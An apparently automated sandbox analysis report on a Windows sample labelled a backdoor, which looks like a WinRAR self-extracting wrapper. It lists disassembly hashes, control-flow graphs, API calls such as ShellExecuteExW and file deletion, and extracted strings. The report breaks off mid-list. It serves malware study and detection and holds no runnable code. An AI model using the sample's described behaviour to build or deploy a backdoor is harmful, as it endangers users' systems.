                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prolog_memcmp
                                                • String ID:
                                                • API String ID: 3004599000-0
                                                • Opcode ID: 84b1d31804a038a0510c63043142c598d2ba1ab9f8b14d3cdb157ed0fa1782e6
                                                • Instruction ID: 56a09f1de806cf078499e5abe4862ca51860e48d0c4a824d9327b8985bb84881
                                                • Opcode Fuzzy Hash: 84b1d31804a038a0510c63043142c598d2ba1ab9f8b14d3cdb157ed0fa1782e6
                                                • Instruction Fuzzy Hash: BB821A70904245EEDF65DB64C885BFABBB9BF05300F0841BBE9499B342DB395A48CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EAEE5
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: H_prologItemTextWindow
                                                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe$LICENSEDLG$P>b$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                • API String ID: 810644672-912058884
                                                • Opcode ID: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
                                                • Instruction ID: 31025ff05378c3e9d74a018decc6327bc99bf36a083cd5b9b496f457e7d3de33
                                                • Opcode Fuzzy Hash: 3506f9dbf26ce25577c283ff0cbdc102267382b782f430278f29c6beed1c7172
                                                • Instruction Fuzzy Hash: 1542CEB0946294FEEB21ABA19C8AFEF3B7CFB09700F004455F645A62D1CB7C5944CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 257 7e00cf-7e00ee call 7ee360 GetModuleHandleW 260 7e0154-7e03b2 257->260 261 7e00f0-7e0107 GetProcAddress 257->261 262 7e03b8-7e03c3 call 7f70dd 260->262 263 7e0484-7e04b3 GetModuleFileNameW call 7dbc85 call 7dfe56 260->263 264 7e0109-7e011f 261->264 265 7e0121-7e0131 GetProcAddress 261->265 262->263 273 7e03c9-7e03fa GetModuleFileNameW CreateFileW 262->273 279 7e04b5-7e04bf call 7dacf5 263->279 264->265 265->260 268 7e0133-7e0152 265->268 268->260 276 7e03fc-7e040a SetFilePointer 273->276 277 7e0478-7e047f CloseHandle 273->277 276->277 280 7e040c-7e0429 ReadFile 276->280 277->263 285 7e04cc 279->285 286 7e04c1-7e04c5 call 7e0085 279->286 280->277 282 7e042b-7e0450 280->282 284 7e046d-7e0476 call 7dfbd8 282->284 284->277 294 7e0452-7e046c call 7e0085 284->294 289 7e04ce-7e04d0 285->289 291 7e04ca 286->291 292 7e04f2-7e0518 call 7dbcfb GetFileAttributesW 289->292 293 7e04d2-7e04f0 CompareStringW 289->293 291->289 296 7e051a-7e051e 292->296 301 7e0522 292->301 293->292 293->296 294->284 296->279 299 7e0520 296->299 302 7e0526-7e0528 299->302 301->302 303 7e052a 302->303 304 7e0560-7e0562 302->304 305 7e052c-7e0552 call 7dbcfb GetFileAttributesW 303->305 306 7e066f-7e0679 304->306 307 7e0568-7e057f call 7dbccf call 7dacf5 304->307 313 7e055c 305->313 314 7e0554-7e0558 305->314 317 7e05e7-7e061a call 7d400a AllocConsole 307->317 318 7e0581-7e05e2 call 7e0085 * 2 call 7dddd1 call 7d400a call 7dddd1 call 7e9f35 307->318 313->304 314->305 316 7e055a 314->316 316->304 323 7e061c-7e0661 GetCurrentProcessId AttachConsole call 7f35b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->323 324 7e0667-7e0669 ExitProcess 317->324 318->324 323->324
                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
                                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E03D4
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E03F0
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007E0402
                                                • ReadFile.KERNEL32(00000000,?,00007FFE,00803BA4,00000000), ref: 007E0421
                                                • CloseHandle.KERNEL32(00000000), ref: 007E0479
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 007E048F
                                                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 007E04E7
                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 007E0510
                                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 007E054A
                                                  • Part of subcall function 007E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                  • Part of subcall function 007E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                • _swprintf.LIBCMT ref: 007E05BE
                                                • _swprintf.LIBCMT ref: 007E060A
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • AllocConsole.KERNEL32 ref: 007E0612
                                                • GetCurrentProcessId.KERNEL32 ref: 007E061C
                                                • AttachConsole.KERNEL32(00000000), ref: 007E0623
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 007E0649
                                                • WriteConsoleW.KERNEL32(00000000), ref: 007E0650
                                                • Sleep.KERNEL32(00002710), ref: 007E065B
                                                • FreeConsole.KERNEL32 ref: 007E0661
                                                • ExitProcess.KERNEL32 ref: 007E0669
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                • API String ID: 1201351596-3298887752
                                                • Opcode ID: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
                                                • Instruction ID: 5f86806a2426aea97e23a5d85224d67f789526708918ca85cba238913be5f531
                                                • Opcode Fuzzy Hash: 672569b21f4462029c3f16eb68e86c3e8c54eda0bec0a46c137dfec849c9d237
                                                • Instruction Fuzzy Hash: FDD161B1149784ABD3A09F91DC49B9FBAECFB85704F00491DF789D6290DBB4864C8B62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 406 7ebdf5-7ebe0d call 7ee28c call 7ee360 411 7ebe13-7ebe3d call 7eaa36 406->411 412 7eca90-7eca9d 406->412 411->412 415 7ebe43-7ebe48 411->415 416 7ebe49-7ebe57 415->416 417 7ebe58-7ebe6d call 7ea6c7 416->417 420 7ebe6f 417->420 421 7ebe71-7ebe86 call 7e17ac 420->421 424 7ebe88-7ebe8c 421->424 425 7ebe93-7ebe96 421->425 424->421 426 7ebe8e 424->426 427 7eca5c-7eca87 call 7eaa36 425->427 428 7ebe9c 425->428 426->427 427->416 439 7eca8d-7eca8f 427->439 429 7ec074-7ec076 428->429 430 7ec115-7ec117 428->430 431 7ec132-7ec134 428->431 432 7ebea3-7ebea6 428->432 429->427 436 7ec07c-7ec088 429->436 430->427 434 7ec11d-7ec12d SetWindowTextW 430->434 431->427 435 7ec13a-7ec141 431->435 432->427 437 7ebeac-7ebf06 call 7e9da4 call 7db965 call 7da49d call 7da5d7 call 7d70bf 432->437 434->427 435->427 440 7ec147-7ec160 435->440 441 7ec09c-7ec0a1 436->441 442 7ec08a-7ec09b call 7f7168 436->442 492 7ec045-7ec05a call 7da52a 437->492 439->412 444 7ec168-7ec176 call 7f35b3 440->444 445 7ec162 440->445 448 7ec0ab-7ec0b6 call 7eab9a 441->448 449 7ec0a3-7ec0a9 441->449 442->441 444->427 462 7ec17c-7ec185 444->462 445->444 453 7ec0bb-7ec0bd 448->453 449->453 455 7ec0bf-7ec0c6 call 7f35b3 453->455 456 7ec0c8-7ec0e8 call 7f35b3 call 7f35de 453->456 455->456 481 7ec0ea-7ec0f1 456->481 482 7ec101-7ec103 456->482 466 7ec1ae-7ec1b1 462->466 467 7ec187-7ec18b 462->467 469 7ec296-7ec2a4 call 7dfe56 466->469 470 7ec1b7-7ec1ba 466->470 467->466 472 7ec18d-7ec195 467->472 490 7ec2a6-7ec2ba call 7f17cb 469->490 474 7ec1bc-7ec1c1 470->474 475 7ec1c7-7ec1e2 470->475 472->427 478 7ec19b-7ec1a9 call 7dfe56 472->478 474->469 474->475 493 7ec22c-7ec233 475->493 494 7ec1e4-7ec21e 475->494 478->490 487 7ec0f8-7ec100 call 7f7168 481->487 488 7ec0f3-7ec0f5 481->488 482->427 489 7ec109-7ec110 call 7f35ce 482->489 487->482 488->487 489->427 505 7ec2bc-7ec2c0 490->505 506 7ec2c7-7ec318 call 7dfe56 call 7ea8d0 GetDlgItem SetWindowTextW SendMessageW call 7f35e9 490->506 511 7ebf0b-7ebf1f SetFileAttributesW 492->511 512 7ec060-7ec06f call 7da4b3 492->512 502 7ec235-7ec24d call 7f35b3 493->502 503 7ec261-7ec284 call 7f35b3 * 2 493->503 529 7ec222-7ec224 494->529 530 7ec220 494->530 502->503 516 7ec24f-7ec25c call 7dfe2e 502->516 503->490 534 7ec286-7ec294 call 7dfe2e 503->534 505->506 513 7ec2c2-7ec2c4 505->513 540 7ec31d-7ec321 506->540 517 7ebfc5-7ebfd5 GetFileAttributesW 511->517 518 7ebf25-7ebf58 call 7db4f7 call 7db207 call 7f35b3 511->518 512->427 513->506 516->503 517->492 527 7ebfd7-7ebfe6 DeleteFileW 517->527 549 7ebf5a-7ebf69 call 7f35b3 518->549 550 7ebf6b-7ebf79 call 7db925 518->550 527->492 533 7ebfe8-7ebfeb 527->533 529->493 530->529 537 7ebfef-7ec01b call 7d400a GetFileAttributesW 533->537 534->490 547 7ebfed-7ebfee 537->547 548 7ec01d-7ec033 MoveFileW 537->548 540->427 544 7ec327-7ec33b SendMessageW 540->544 544->427 547->537 548->492 551 7ec035-7ec03f MoveFileExW 548->551 549->550 556 7ebf7f-7ebfbe call 7f35b3 call 7ef350 549->556 550->512 550->556 551->492 556->517
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007EBDFA
                                                  • Part of subcall function 007EAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 007EAAFE
                                                • SetWindowTextW.USER32(?,?), ref: 007EC127
                                                • _wcsrchr.LIBVCRUNTIME ref: 007EC2B1
                                                • GetDlgItem.USER32(?,00000066), ref: 007EC2EC
                                                • SetWindowTextW.USER32(00000000,?), ref: 007EC2FC
                                                • SendMessageW.USER32(00000000,00000143,00000000,0081A472), ref: 007EC30A
                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007EC335
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                • API String ID: 3564274579-312220925
                                                • Opcode ID: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
                                                • Instruction ID: 6aac3d8b9252ea112e70e6282f888189a33efc1b2cea1137a3e674c2a09bd7a6
                                                • Opcode Fuzzy Hash: a10e25585427896f0f0ada2bb21935fe283f656f348d83d492738669c6f240c5
                                                • Instruction Fuzzy Hash: AEE19176D01258EADB26DBA5DC49DEF777CBF08310F0040A6F609E3191EB789A85CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 561 7dd341-7dd378 call 7ee28c call 7ee360 call 7f15e8 568 7dd3ab-7dd3b4 call 7dfe56 561->568 569 7dd37a-7dd3a9 GetModuleFileNameW call 7dbc85 call 7dfe2e 561->569 573 7dd3b9-7dd3dd call 7d9619 call 7d99b0 568->573 569->573 580 7dd7a0-7dd7a6 call 7d9653 573->580 581 7dd3e3-7dd3eb 573->581 586 7dd7ab-7dd7bb 580->586 583 7dd3ed-7dd405 call 7e3781 * 2 581->583 584 7dd409-7dd438 call 7f5a90 * 2 581->584 594 7dd407 583->594 595 7dd43b-7dd43e 584->595 594->584 596 7dd56c-7dd58f call 7d9d30 call 7f35d3 595->596 597 7dd444-7dd44a call 7d9e40 595->597 596->580 606 7dd595-7dd5b0 call 7d9bf0 596->606 601 7dd44f-7dd476 call 7d9bf0 597->601 607 7dd47c-7dd484 601->607 608 7dd535-7dd538 601->608 622 7dd5b9-7dd5cc call 7f35d3 606->622 623 7dd5b2-7dd5b7 606->623 611 7dd4af-7dd4ba 607->611 612 7dd486-7dd48e 607->612 609 7dd53b-7dd55d call 7d9d30 608->609 609->595 627 7dd563-7dd566 609->627 614 7dd4bc-7dd4c8 611->614 615 7dd4e5-7dd4ed 611->615 612->611 617 7dd490-7dd4aa call 7f5ec0 612->617 614->615 619 7dd4ca-7dd4cf 614->619 620 7dd4ef-7dd4f7 615->620 621 7dd519-7dd51d 615->621 633 7dd4ac 617->633 634 7dd52b-7dd533 617->634 619->615 628 7dd4d1-7dd4e3 call 7f5808 619->628 620->621 629 7dd4f9-7dd513 call 7f5ec0 620->629 621->608 630 7dd51f-7dd522 621->630 622->580 639 7dd5d2-7dd5ee call 7e137a call 7f35ce 622->639 631 7dd5f1-7dd5f8 623->631 627->580 627->596 628->615 644 7dd527 628->644 629->580 629->621 630->607 636 7dd5fc-7dd625 call 7dfdfb call 7f35d3 631->636 637 7dd5fa 631->637 633->611 634->609 651 7dd627-7dd62e call 7f35ce 636->651 652 7dd633-7dd649 636->652 637->636 639->631 644->634 651->580 653 7dd64f-7dd65d 652->653 654 7dd731-7dd757 call 7dce72 call 7f35ce * 2 652->654 657 7dd664-7dd669 653->657 694 7dd759-7dd76f call 7e3781 * 2 654->694 695 7dd771-7dd79d call 7f5a90 * 2 654->695 659 7dd97c-7dd984 657->659 660 7dd66f-7dd678 657->660 664 7dd72b-7dd72e 659->664 665 7dd98a-7dd98e 659->665 662 7dd67a-7dd67e 660->662 663 7dd684-7dd68b 660->663 662->659 662->663 667 7dd691-7dd6b6 663->667 668 7dd880-7dd891 call 7dfcbf 663->668 664->654 669 7dd9de-7dd9e4 665->669 670 7dd990-7dd996 665->670 674 7dd6b9-7dd6de call 7f35b3 call 7f5808 667->674 686 7dd897-7dd8c0 call 7dfe56 call 7f5885 668->686 687 7dd976-7dd979 668->687 672 7dda0a-7dda2a call 7dce72 669->672 673 7dd9e6-7dd9ec 669->673 675 7dd99c-7dd9a3 670->675 676 7dd722-7dd725 670->676 698 7dda02-7dda05 672->698 673->672 680 7dd9ee-7dd9f4 673->680 712 7dd6f6 674->712 713 7dd6e0-7dd6ea 674->713 683 7dd9ca 675->683 684 7dd9a5-7dd9a8 675->684 676->657 676->664 680->676 689 7dd9fa-7dda01 680->689 688 7dd9cc-7dd9d9 683->688 692 7dd9aa-7dd9ad 684->692 693 7dd9c6-7dd9c8 684->693 686->687 721 7dd8c6-7dd93c call 7e1596 call 7dfdfb call 7dfdd4 call 7dfdfb call 7f58d9 686->721 687->659 688->676 689->698 700 7dd9af-7dd9b2 692->700 701 7dd9c2-7dd9c4 692->701 693->688 694->695 695->580 707 7dd9be-7dd9c0 700->707 708 7dd9b4-7dd9b8 700->708 701->688 707->688 708->680 714 7dd9ba-7dd9bc 708->714 715 7dd6f9-7dd6fd 712->715 713->712 719 7dd6ec-7dd6f4 713->719 714->688 715->674 720 7dd6ff-7dd706 715->720 719->715 722 7dd70c-7dd71a call 7dfdfb 720->722 723 7dd7be-7dd7c1 720->723 753 7dd93e-7dd947 721->753 754 7dd94a-7dd95f 721->754 728 7dd71f 722->728 723->668 727 7dd7c7-7dd7ce 723->727 730 7dd7d6-7dd7d7 727->730 731 7dd7d0-7dd7d4 727->731 728->676 730->727 731->730 733 7dd7d9-7dd7e7 731->733 734 7dd7e9-7dd7ec 733->734 735 7dd808-7dd830 call 7e1596 733->735 737 7dd7ee-7dd803 734->737 738 7dd805 734->738 743 7dd853-7dd85b 735->743 744 7dd832-7dd84e call 7f35e9 735->744 737->734 737->738 738->735 747 7dd85d 743->747 748 7dd862-7dd87b call 7ddd6b 743->748 744->728 747->748 748->728 753->754 756 7dd960-7dd967 754->756 757 7dd969-7dd96d 756->757 758 7dd973-7dd974 756->758 757->728 757->758 758->756
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007DD346
                                                • _wcschr.LIBVCRUNTIME ref: 007DD367
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,007DD328,?), ref: 007DD382
                                                • __fprintf_l.LIBCMT ref: 007DD873
                                                  • Part of subcall function 007E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,007DB652,00000000,?,?,?,0001041A), ref: 007E1396
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                • API String ID: 4184910265-980926923
                                                • Opcode ID: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
                                                • Instruction ID: 1925ce5728921edcc97bc0ea29bd7d70955d3f49662165c6bfe71f4fa674649d
                                                • Opcode Fuzzy Hash: 6846c4ec9c3ef5d2bfa47197903d199ce6ee48304dbbac20910799ddfdfff58b
                                                • Instruction Fuzzy Hash: 3E12B1B1900219DACF34DFA4DC95AEEB7B5FF44310F10456AE606A7381EB79AE44CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
                                                  • Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
                                                  • Part of subcall function 007EAC74: IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                  • Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
                                                  • Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2
                                                • GetDlgItem.USER32(00000068,0082ECB0), ref: 007ECB6E
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,007EA632,00000001,?,?,007EAECB,00804F88,0082ECB0), ref: 007ECB96
                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 007ECBA1
                                                • SendMessageW.USER32(00000000,000000C2,00000000,008035B4), ref: 007ECBAF
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECBC5
                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 007ECBDF
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC23
                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 007ECC31
                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 007ECC40
                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 007ECC67
                                                • SendMessageW.USER32(00000000,000000C2,00000000,0080431C), ref: 007ECC76
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                • String ID: \
                                                • API String ID: 3569833718-2967466578
                                                • Opcode ID: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
                                                • Instruction ID: c64c597aa42ba95aea1fcaab22b3a2bedefd1fb43b21435295c997cb21e34d5d
                                                • Opcode Fuzzy Hash: e429890a9a34df0902bcfb39bef8a6a38b5db1867a2787f41791d672f71c3360
                                                • Instruction Fuzzy Hash: 1631CF71185B51BFE301DF20AC5AFAB7FACFB86704F000918F651962A1DB685908C7BA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 796 7ece22-7ece3a call 7ee360 799 7ed08b-7ed093 796->799 800 7ece40-7ece4c call 7f35b3 796->800 800->799 803 7ece52-7ece7a call 7ef350 800->803 806 7ece7c 803->806 807 7ece84-7ece91 803->807 806->807 808 7ece95-7ece9e 807->808 809 7ece93 807->809 810 7eced6 808->810 811 7ecea0-7ecea2 808->811 809->808 813 7eceda-7ecedd 810->813 812 7eceaa-7ecead 811->812 814 7ed03c-7ed041 812->814 815 7eceb3-7ecebb 812->815 816 7ecedf-7ecee2 813->816 817 7ecee4-7ecee6 813->817 820 7ed036-7ed03a 814->820 821 7ed043 814->821 818 7ed055-7ed05d 815->818 819 7ecec1-7ecec7 815->819 816->817 822 7ecef9-7ecf0e call 7db493 816->822 817->822 823 7ecee8-7eceef 817->823 827 7ed05f-7ed061 818->827 828 7ed065-7ed06d 818->828 819->818 825 7ececd-7eced4 819->825 820->814 826 7ed048-7ed04c 820->826 821->826 831 7ecf27-7ecf32 call 7da180 822->831 832 7ecf10-7ecf1d call 7e17ac 822->832 823->822 829 7ecef1 823->829 825->810 825->812 826->818 827->828 828->813 829->822 838 7ecf4f-7ecf5c ShellExecuteExW 831->838 839 7ecf34-7ecf4b call 7db239 831->839 832->831 837 7ecf1f 832->837 837->831 841 7ed08a 838->841 842 7ecf62-7ecf6f 838->842 839->838 841->799 844 7ecf82-7ecf84 842->844 845 7ecf71-7ecf78 842->845 847 7ecf9b-7ecfba call 7ed2e6 844->847 848 7ecf86-7ecf8f 844->848 845->844 846 7ecf7a-7ecf80 845->846 846->844 849 7ecff1-7ecffd CloseHandle 846->849 847->849 866 7ecfbc-7ecfc4 847->866 848->847 857 7ecf91-7ecf99 ShowWindow 848->857 850 7ed00e-7ed01c 849->850 851 7ecfff-7ed00c call 7e17ac 849->851 855 7ed01e-7ed020 850->855 856 7ed079-7ed07b 850->856 851->850 863 7ed072 851->863 855->856 861 7ed022-7ed028 855->861 856->841 860 7ed07d-7ed07f 856->860 857->847 860->841 864 7ed081-7ed084 ShowWindow 860->864 861->856 865 7ed02a-7ed034 861->865 863->856 864->841 865->856 866->849 867 7ecfc6-7ecfd7 GetExitCodeProcess 866->867 867->849 868 7ecfd9-7ecfe3 867->868 869 7ecfea 868->869 870 7ecfe5 868->870 869->849 870->869
                                                APIs
                                                • ShellExecuteExW.SHELL32(?), ref: 007ECF54
                                                • ShowWindow.USER32(?,00000000), ref: 007ECF93
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 007ECFCF
